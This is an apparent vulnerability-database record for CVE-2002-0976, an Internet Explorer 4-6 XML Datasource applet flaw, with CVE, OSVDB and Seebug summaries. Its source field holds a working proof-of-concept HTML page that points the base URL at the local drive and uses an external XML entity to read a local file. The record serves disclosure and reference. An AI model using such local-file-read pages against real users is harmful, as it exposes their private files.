Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:21721", "cvelist": ["CVE-2002-0976"], "modified": "2002-08-17T00:00:00", "lastseen": "2016-02-02T17:07:15", "edition": 1, "sourceData": "source: http://www.securityfocus.com/bid/5490/info\r\n\r\nA problem in Microsoft Internet Explorer could lead to the disclosure of sensitive information.\r\n\r\nDue to the design of the datasource applet, it may be possible for a user to view the contents of local files via a remote page. By building a custom-crafted page that specifies the code base as the local system, it would be possible to display the contents of known local files.\r\n\r\n<html>\r\n<head>\r\n<base href=\"file:///C:/\">\r\n</head>\r\n<body>\r\n<applet code=\"com.ms.xml.dso.XMLDSO.class\" width=\"0\" height=\"0\" id=\"xmldso\" MAYSCRIPT=\"true\">\r\n<?xml version=\"1.0\"?>\r\n<!DOCTYPE file [\r\n<!ELEMENT file (#PCDATA) >\r\n<!ENTITY contents SYSTEM \"file:///C:/jelmer.txt\">\r\n]>\r\n<file>\r\n&contents;\r\n</file>\r\n</applet>\r\n<script language=\"javascript\">\r\nsetTimeout(\"showIt()\",2000);\r\nfunction showIt() {\r\nvar jelmer = xmldso.getDocument();\r\nalert(jelmer.Text);\r\n}\r\n</script>\r\n</body>\r\n</html>", "published": "2002-08-17T00:00:00", "href": "https://www.exploit-db.com/exploits/21721/", "osvdbidlist": ["2977"], "reporter": "Jelmer", "hash": "56cc60b4be3e5e8bb57c6e7864fa3ea958c54bff05181ca841238d6fb52bafd4", "title": "Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability. CVE-2002-0976. Local exploit for windows platform", "references": [], "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/21721/", "enchantments": {"vulnersScore": 2.6}}

{"result": {"cve": [{"id": "CVE-2002-0976", "type": "cve", "title": "CVE-2002-0976", "description": "Internet Explorer 4.0 and later allows remote attackers to read arbitrary files via a web page that accesses a legacy XML Datasource applet (com.ms.xml.dso.XMLDSO.class) and modifies the base URL to point to the local system, which is trusted by the applet.", "published": "2002-09-24T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0976", "cvelist": ["CVE-2002-0976"], "lastseen": "2017-04-18T15:49:46"}], "osvdb": [{"id": "OSVDB:2977", "type": "osvdb", "title": "Microsoft IE XML Datasource Read Local Files", "description": "## Vulnerability Description\nMicrosoft Internet Explorer may allow remote attackers to read the contents of local files. Due to a flaw in the XML Datasource applet, if \"file:///C:/\" is specified as the codebase reference in the HTML header, the attacker could use the XMLDSO applet to read local files on the system.\n\n\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.\n## Short Description\nMicrosoft Internet Explorer may allow remote attackers to read the contents of local files. Due to a flaw in the XML Datasource applet, if \"file:///C:/\" is specified as the codebase reference in the HTML header, the attacker could use the XMLDSO applet to read local files on the system.\n\n\n## References:\nMicrosoft Security Bulletin: MS03-015\nMicrosoft Security Bulletin: MS03-011\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2002-08/0162.html\nISS X-Force ID: 9885\n[CVE-2002-0976](https://vulners.com/cve/CVE-2002-0976)\nBugtraq ID: 5490\n", "published": "2002-08-17T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://vulners.com/osvdb/OSVDB:2977", "cvelist": ["CVE-2002-0976"], "lastseen": "2017-04-28T13:19:57"}], "seebug": [{"id": "SSV-75543", "type": "seebug", "title": "Microsoft Internet Explorer 4/5/6 XML Datasource Applet File Disclosure Vulnerability", "description": "Summary: \n \nMicrosoft Internet Explorer is a Microsoft developed WEB browser, contains an XML Datasource applet applet.< br/>Microsoft Internet Explorer XML Datasource applet there is a design issue, a remote attacker could exploit this vulnerability to view the system in any known file name of the file.< br/>XML Datasource applet can be used as follows on a WEB page: \n \n \nas shown above, the user does not need to specify the class from which the jar or cab file, so this class from the specified from a local file, an attacker can build the CODEBASE tag to point to a local file()of the page, when other users view this page, can lead to the specified file system is displayed. In know that the user system the file name in the case, an attacker could view the user process permission to read the system of any of the contents of the file.< br/>\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.seebug.org/vuldb/ssvid-75543", "cvelist": ["CVE-2002-0976"], "lastseen": "2016-07-26T21:13:45"}]}}